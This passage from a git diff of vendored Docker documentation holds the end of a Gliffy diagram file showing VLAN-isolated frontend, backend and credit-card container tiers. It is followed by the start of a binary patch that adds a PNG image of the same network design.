style=\"text-decoration:none;\">Eth0 <span style=\"font-weight:bold;\">10.1.30.0/24</span></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":379,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":380,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":214.0,"y":503.0100878848685,"rotation":0.0,"id":374,"width":135.0,"height":20.162601626016258,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">Backend</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":376.0,"y":502.0100878848684,"rotation":0.0,"id":373,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">Credit Cards</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":627.0,"y":99.94304076572786,"rotation":0.0,"id":364,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":25,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":363,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":342,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-183.0,310.0670471191406],[-183.0,292.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":410.0100878848684,"rotation":0.0,"id":363,"width":144.0,"height":117.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":218.0,"y":341.5100878848684,"rotation":0.0,"id":366,"width":132.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">Parent: <span style=\"font-weight:bold;\">eth0.20</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">VLAN ID: <span style=\"font-weight:bold;\">20</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":297.0,"y":89.94304076572786,"rotation":0.0,"id":356,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":22,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":353,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":343,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-13.0,320.0670471191406],[-13.0,302.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":222.0,"y":420.0100878848684,"rotation":0.0,"id":348,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":349,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":350,"width":98.00597014925374,"height":44.0,"uid":null,"order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container(s)</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Eth0 <span style=\"font-weight:bold;\">10.1.20.0/24</span></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":351,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":352,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":13,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":410.0100878848684,"rotation":0.0,"id":353,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":332.0100878848684,"rotation":0.0,"id":343,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":203.0,"y":307.5100878848684,"rotation":0.0,"id":333,"width":160.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:20px;font-family:Arial;\"><span style=\"font-weight:bold;\">eth0</span>&nbsp;Interface</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":303.0,"y":240.51008788486845,"rotation":0.0,"id":323,"width":261.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":8,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;font-weight:bold;font-family:Arial;\">802.1Q Trunk - </span><span style=\"font-size:14px;font-family:Arial;\"><span style=\"font-style:italic;\">can be a single Ethernet link or Multiple Bonded Ethernet links</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.0,"y":291.0100878848684,"rotation":0.0,"id":290,"width":497.0,"height":80.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":543.5100878848684,"rotation":0.0,"id":282,"width":569.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;\"><span style=\"font-weight:bold;\">Docker Host</span></span><span style=\"font-size:14px;font-style:italic;\">: Frontend, Backend &amp; Credit Card App Tiers are&nbsp;<span style=\"font-weight:bold;\">Isolated</span></span><span style=\"font-size:14px;\">&nbsp;but can still communicate inside <span style=\"font-weight:bold;\">parent</span> interface or any other Docker hosts using the <span style=\"font-weight:bold;\">VLAN ID</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-33.0,"y":79.94304076572786,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":5,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":345,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":340,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[157.0,330.0670471191406],[157.0,312.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":410.0100878848684,"rotation":0.0,"id":345,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":323.0100878848684,"rotation":0.0,"id":276,"width":531.0,"height":259.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":19.609892022503004,"y":20.27621073737908,"rotation":355.62347411485274,"id":246,"width":540.0106597126834,"height":225.00000000000003,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":2,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":1.0,"y":99.94304076572786,"rotation":0.0,"id":394,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":3.0,"strokeColor":"#666666","fillColor":"#999999","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[261.0,233.5670471191406],[261.0,108.05111187584177]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.0,"y":90.94304076572786,"rotation":0.0,"id":481,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":3.0,"strokeColor":"#666666","fillColor":"#999999","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[261.0,233.56704711914062],[261.0,108.05111187584174]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":104}],"shapeStyles":{},"lineStyles":{"global":{"fill":"#999999","stroke":"#38761d","strokeWidth":3,"dashStyle":"1.0,1.0","orthoMode":2}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"14px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117295143,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png
new file mode 100644
index 0000000000000000000000000000000000000000..32d95f600e1d0f028e5a354584d7b3eac1639e35
GIT binary patch
literal 38837
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
